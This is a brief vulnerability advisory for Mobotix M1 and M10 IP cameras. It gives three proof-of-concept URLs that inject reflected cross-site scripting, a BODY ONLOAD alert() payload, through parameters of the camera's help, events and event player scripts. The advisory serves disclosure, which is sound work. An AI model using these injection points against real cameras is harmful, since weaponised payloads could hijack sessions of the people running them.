Mobotix IP Network Cameras Multiple XSS

Version: Tested on M1 and M10
    - M10-V2.0.5.2
    - M1-V1.9.4.7

Discovered by: jaime.blasco(at)eazel(dot).es 
http://www.eazel.es

Description:

Mobotix is vulnerable to multiple security vulnerabilites that allow cross site scripting flaws.

Due to improper filtering a remote attacker can cause a cross site scripting in these scripts:


http://camera/help/help?%3CBODY%20ONLOAD=alert('www.eazel.es')%3E

http://camera/control/events.tar?source_ip=%3CBODY%20ONLOAD=alert('www.eazel.es')%3E&download=egal

http://camera/control/eventplayer?get_image_info_abspath=%3CBODY%20ONLOAD=alert('www.eazel.es')%3E

The advisorie can be found at : http://www.eazel.es/media/advisory001.html